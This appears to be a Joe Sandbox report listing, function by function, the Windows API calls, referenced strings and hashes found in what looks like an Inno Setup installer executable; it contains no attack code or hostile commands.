                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570CreateFontIndirectObjectSelect
                                                                          • String ID: ...\
                                                                          • API String ID: 2998766281-983595016
                                                                          • Opcode ID: 9df2e027a5ad20ed6d7352ee69e297a86736b9e25cbcddb4c0eeddf445b1d3af
                                                                          • Instruction ID: 308711b3510e2d142e5f8917cb1a7286c815dd25c3ebae82bdfc5a56718784f8
                                                                          • Opcode Fuzzy Hash: 9df2e027a5ad20ed6d7352ee69e297a86736b9e25cbcddb4c0eeddf445b1d3af
                                                                          • Instruction Fuzzy Hash: 79315070B00129ABDF11EB9AD841BAEB7B8FF49304F90447BF410A7291D7789E41CA69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(?,0048CF6A,?,?,00000001,00000000,00000000,0048CF85), ref: 0048CF53
                                                                          Strings
                                                                          • %s\%s_is1, xrefs: 0048CEE4
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0048CEC6
                                                                          • Inno Setup CodeFile: , xrefs: 0048CF16
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1837835967
                                                                          • Opcode ID: a5317e2cdf1504813c9fe7444e3c67d1a119a8e89a958819ee54ab3caef088f8
                                                                          • Instruction ID: 9198a2c89c650ecdb9ea5b928749e7ef7688678c62cd245957542d324bac4bf5
                                                                          • Opcode Fuzzy Hash: a5317e2cdf1504813c9fe7444e3c67d1a119a8e89a958819ee54ab3caef088f8
                                                                          • Instruction Fuzzy Hash: 9B316374A042045FDB01EFA5DC91A9EBBF9EB4C704F50447BE604E7391D7789A058B68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                          • UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                          • RegisterClassA.USER32(?), ref: 0041643E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoRegisterUnregister
                                                                          • String ID: @
                                                                          • API String ID: 3749476976-2766056989
                                                                          • Opcode ID: 5b73e54eb71c748753e3b8d1054902b7c0852253915f9ea95734fd2023c17c48
                                                                          • Instruction ID: 182fc5ce89434e719f204c44de6314d23bdba4c1adcba5a9141eaa64fba15999
                                                                          • Opcode Fuzzy Hash: 5b73e54eb71c748753e3b8d1054902b7c0852253915f9ea95734fd2023c17c48
                                                                          • Instruction Fuzzy Hash: F4318E702042008BD760EF68C881B9B77E5AB88308F00447FFA85CB392DB39D9448B6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,004928F5,00000000,0049211E,?,?,00000000,00494628), ref: 00492098
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,004928F5,00000000,0049211E,?,?,00000000,00494628), ref: 004920C1
                                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004920DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$Move
                                                                          • String ID: isRS-%.3u.tmp
                                                                          • API String ID: 3839737484-3657609586
                                                                          • Opcode ID: bf2922b1aaa6c30ca688b35688b4cf24069c5c6910dd478e72a2b9c309e37070
                                                                          • Instruction ID: b810cc2a7e5d2205544a106a5c70962c88f81ee0cc3f37104223c1277275e24c
                                                                          • Opcode Fuzzy Hash: bf2922b1aaa6c30ca688b35688b4cf24069c5c6910dd478e72a2b9c309e37070
                                                                          • Instruction Fuzzy Hash: 92216470D00219BFDF14EFA9C9829AFBBB9EB54314F10453AB814B72D1D6785E018A59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                          • ExitProcess.KERNEL32 ref: 00404E0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ExitMessageProcess
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1220098344-2970929446
                                                                          • Opcode ID: a06c2f23053dee05738a3b3847c410c2c592315d1a0ade8e47e6ee14016d8d79
                                                                          • Instruction ID: 4d0016c8d5fe4094e25e5fe0be570a8f0713ad45d294035ab8c8bb1c6a4e5ebc
                                                                          • Opcode Fuzzy Hash: a06c2f23053dee05738a3b3847c410c2c592315d1a0ade8e47e6ee14016d8d79
                                                                          • Instruction Fuzzy Hash: 7421B360A442418ADB21AB75EC81F163BD197EA349F04817BE700B77E6C67C894687AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00454CB0
                                                                          • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00454CDD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                          • String ID: LoadTypeLib$RegisterTypeLib
                                                                          • API String ID: 1312246647-2435364021
                                                                          • Opcode ID: f61e69b483cb001645570106c37636ac553a9824954e6e8b6d66c00c2f183d59
                                                                          • Instruction ID: d9fba730cb80c63aa19026fdd437f4fece929029815e2f29f966a9b9864a7c3d
                                                                          • Opcode Fuzzy Hash: f61e69b483cb001645570106c37636ac553a9824954e6e8b6d66c00c2f183d59
                                                                          • Instruction Fuzzy Hash: C411B430A00604AFDB11DFA6DC51A5EB7BDEBC9709B108476FD04D7651DA389D48C614
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          • GetFocus.USER32 ref: 004736A7
                                                                          • GetKeyState.USER32(0000007A), ref: 004736B9
                                                                          • WaitMessage.USER32(?,00000000,004736E0,?,00000000,00473707,?,?,00000001,00000000,?,?,?,?,0047AADF,00000000), ref: 004736C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: FocusMessageStateTextWaitWindow
                                                                          • String ID: Wnd=$%x
                                                                          • API String ID: 1381870634-2927251529
                                                                          • Opcode ID: b6f1723f8a55a4a9afafee02d062e7fd811883cc0c30f314c2a81b90cb0acb04
                                                                          • Instruction ID: f4d105e05b809c76e67ff73c629a241912eba9488d1d76ce0f5d4fdfd1301c88
                                                                          • Opcode Fuzzy Hash: b6f1723f8a55a4a9afafee02d062e7fd811883cc0c30f314c2a81b90cb0acb04
                                                                          • Instruction Fuzzy Hash: 67119170600244BFC710EF65DC52A9E7BB8EB49705B5184BAF408E3751D63DAE00DA6D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046A04C
                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046A05B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$LocalSystem
                                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                          • API String ID: 1748579591-1013271723
                                                                          • Opcode ID: dc3105fb6ee909ab4cd4d42845ef41477d175ff5fb8b3213b724df48f3a92d37
                                                                          • Instruction ID: 9e815eb500cce11188de23773c3f03aef7f324e38ca19cda18ee53b31b17b2fc
                                                                          • Opcode Fuzzy Hash: dc3105fb6ee909ab4cd4d42845ef41477d175ff5fb8b3213b724df48f3a92d37
                                                                          • Instruction Fuzzy Hash: 9B11F8A140C3919ED340DF2AC44436BBAE4AB89704F44896EF9D8D6381E779C948DB77
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004527E3
                                                                            • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452808
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesDeleteErrorLastMove
                                                                          • String ID: DeleteFile$MoveFile
                                                                          • API String ID: 3024442154-139070271
                                                                          • Opcode ID: 8a70b1347f387fedb58c3f0c09c3bda5820d5cffeb643f0c2558e4fcea15fbdb
                                                                          • Instruction ID: 7497217c6fa166c3be30eb44807793be619cf2db8189df8da4fe663aa424cbd4
                                                                          • Opcode Fuzzy Hash: 8a70b1347f387fedb58c3f0c09c3bda5820d5cffeb643f0c2558e4fcea15fbdb
                                                                          • Instruction Fuzzy Hash: 8EF062746041045AE701FAA5DA4366FA3ECEB4530AF61403BF800B76C3DA7C9D094929
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004578A2,00000000,004579EF,?,00000000,00000000,00000000), ref: 004577BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                          • API String ID: 47109696-2631785700
                                                                          • Opcode ID: 6e8da870c8621b75cc6768b696cde9fcf8d5864872e34247e5d0abe67aef6327
                                                                          • Instruction ID: a26262d4258d3973e1aab989b25d4896129656d7849361439c1335197d99e5e3
                                                                          • Opcode Fuzzy Hash: 6e8da870c8621b75cc6768b696cde9fcf8d5864872e34247e5d0abe67aef6327
                                                                          • Instruction Fuzzy Hash: D5F0FF327141106FC710EB1AFC45F0E6688DB9839AF10803BB940C725AC678DC0AC62D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047DE19
                                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047DE3C
                                                                          Strings
                                                                          • CSDVersion, xrefs: 0047DE10
                                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0047DDE6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                          • API String ID: 3677997916-1910633163
                                                                          • Opcode ID: 7813b641c3abcab23e33f1a9844fd0c9a7e2724cdb6d20ee4d37ca6bcb8a843c
                                                                          • Instruction ID: 975d92485e8303bca6679b963d7ec8b17629a584e5fbb74d879917827c530b39
                                                                          • Opcode Fuzzy Hash: 7813b641c3abcab23e33f1a9844fd0c9a7e2724cdb6d20ee4d37ca6bcb8a843c
                                                                          • Instruction Fuzzy Hash: 5CF0A475E10609AADF11DAD0CC45BEF73BCAF14304F208567EA18EB280E7789A04CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004524DE,00000000,00452581,?,?,00000000,00000000,00000000,00000000,00000000,?,0045284D,00000000), ref: 0042D7E6
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D7EC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                          • API String ID: 1646373207-4063490227
                                                                          • Opcode ID: bcb006e1001e7ceda0f2158fab1331f88fd866345d5b6bb6a223a4a56a439a00
                                                                          • Instruction ID: 4db8f333c9a0d948aa4d288d669557f69a64c6eaa67e0ad6c3f7b03414b73d9c
                                                                          • Opcode Fuzzy Hash: bcb006e1001e7ceda0f2158fab1331f88fd866345d5b6bb6a223a4a56a439a00
                                                                          • Instruction Fuzzy Hash: 23E04F61B44B1112D7107ABA9C83A5B10898B88724FA0843B79A5E72C7EDBCD94A1A7D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00492971), ref: 0044F013
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F019
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: NotifyWinEvent$user32.dll
                                                                          • API String ID: 1646373207-597752486
                                                                          • Opcode ID: 14387aedca7aefdef0683c3ddaa71b572771d7d4e504a8f70a8313ae2fd5082f
                                                                          • Instruction ID: d5e9afbdc33ce2732c9423c566c922af1deae432a4d89253bf7da83917605eba
                                                                          • Opcode Fuzzy Hash: 14387aedca7aefdef0683c3ddaa71b572771d7d4e504a8f70a8313ae2fd5082f
                                                                          • Instruction Fuzzy Hash: 8DE0ECE0A42344AEFB10BBF6E942B1B2A90E7D571DB10007BB2006A593CB7C040A8A1E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004929BD,00000001,00000000,004929E1), ref: 00492746
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049274C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                          • API String ID: 1646373207-834958232
                                                                          • Opcode ID: 35b9077db0bf85f0e7bfa9aca20f55309094321a33a805c10598d3184199be09
                                                                          • Instruction ID: eaa947335cb6f520d9ee4e24e6959d85bb97eec5577cdd685d5abce296b2953a
                                                                          • Opcode Fuzzy Hash: 35b9077db0bf85f0e7bfa9aca20f55309094321a33a805c10598d3184199be09
                                                                          • Instruction Fuzzy Hash: 31B09280281702748C1032F20E46E1B4888488072571404B73400B10C2CDEC880528AD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0044AEEC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F009,00492971), ref: 0044AF13
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AF2B
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AF3D
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF4F
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF61
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF73
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF85
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF97
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AFA9
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AFBB
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AFCD
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AFDF
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFF1
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B003
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B015
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B027
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B039
                                                                            • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B04B
                                                                          • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
                                                                          • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                          • API String ID: 2238633743-2683653824
                                                                          • Opcode ID: d51c42bd4142a1419cebe145bcc4e62e91902ea29c04febc714d013a4538a5c6
                                                                          • Instruction ID: 1dc59214256150821f64c4a5b3e010dcdd688bc926fb1e8d07287d1f160dc46b
                                                                          • Opcode Fuzzy Hash: d51c42bd4142a1419cebe145bcc4e62e91902ea29c04febc714d013a4538a5c6
                                                                          • Instruction Fuzzy Hash: EFB09290B80700A19E00B7F25883D2B140C8580F1D720847B7010791DBEA7C500099AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00413CB6
                                                                          • GetDesktopWindow.USER32 ref: 00413D6E
                                                                            • Part of subcall function 00418E30: 6F5BC6F0.COMCTL32(?,00000000,00413F33,00000000,00414043,?,?,00494628), ref: 00418E4C
                                                                            • Part of subcall function 00418E30: ShowCursor.USER32(00000001,?,00000000,00413F33,00000000,00414043,?,?,00494628), ref: 00418E69
                                                                          • SetCursor.USER32(00000000,?,?,?,?,00413A63,00000000,00413A76), ref: 00413DAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CursorDesktopWindow$Show
                                                                          • String ID:
                                                                          • API String ID: 2074268717-0
                                                                          • Opcode ID: 45eab49b9f5213df2d83ef42053e3571740e663cae2ab16979cfe5a355df0160
                                                                          • Instruction ID: f419cdb22dffc734eda11f614feaf6954746e02452764f6a113fc2dd2abbdfc2
                                                                          • Opcode Fuzzy Hash: 45eab49b9f5213df2d83ef42053e3571740e663cae2ab16979cfe5a355df0160
                                                                          • Instruction Fuzzy Hash: C7419275600110AFC700EFB9E984F4677E0AB95315B1684BBE104CB365DA38ED82CF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 004089DD
                                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408A4C
                                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408AE7
                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408B26
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString$FileMessageModuleName
                                                                          • String ID:
                                                                          • API String ID: 704749118-0
                                                                          • Opcode ID: 9475b91f6b12abc75ac03e97528c4589aec67ab33c443f8169a5e3803f66a059
